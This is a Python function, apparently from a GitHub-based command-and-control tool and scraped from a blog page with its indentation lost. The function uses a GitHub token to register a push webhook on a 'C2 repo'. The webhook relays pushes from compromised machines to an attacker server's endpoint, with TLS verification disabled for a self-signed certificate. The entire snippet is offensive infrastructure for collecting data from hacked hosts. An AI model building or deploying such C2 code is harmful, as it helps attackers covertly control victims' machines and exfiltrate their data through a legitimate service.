def create_c2_webhook(config):
print("[*] Creating GitHub webhook for C2 repo that will receive pushes from compromised machines ")
g = Github(config["main_github_token"])
g_user = g.get_user()
repo = g_user.get_repo(config["github_c2_repo_name"])
# this endpoint is defined in server/gitpwnd/controllers.py
webhook_endpoint = config["attacker_server"] + "/api/repo/receive_branch"
# We're using a self-signed cert, so we need to turn off TLS verification for now :(
# See the following for details: https://developer.github.com/v3/repos/hooks/#create-a-hook
hook_secret = str(uuid.uuid4())
params = {"url": webhook_endpoint, "content_type": "json", "secret": hook_secret, "insecure_ssl": "1"}
# PyGithub's create_hook doc:
# http://pygithub.readthedocs.io/en/latest/github_objects/Repository.html?highlight=create_hook
try:
repo.create_hook("web", params, ["push"], True)
except:
print("[!] Web hook already exists")
hook = repo.get_hooks()[0]
if "secret" not in hook.config.keys():
print("[!] Adding a secret to the hook...")
else:
hook_secret = input("Enter webhook secret (Github Repo > Settings > Webhooks > Edit > Inspect 'Secret' element): ")
new_hook_config = hook.config
new_hook_config["secret"] = hook_secret
hook.edit(name=hook.name, config=new_hook_config)
finally:
return hook_secret
# Automatically generate a new password for the gitpwnd server
# so we don't use a default one
评论列表
文章目录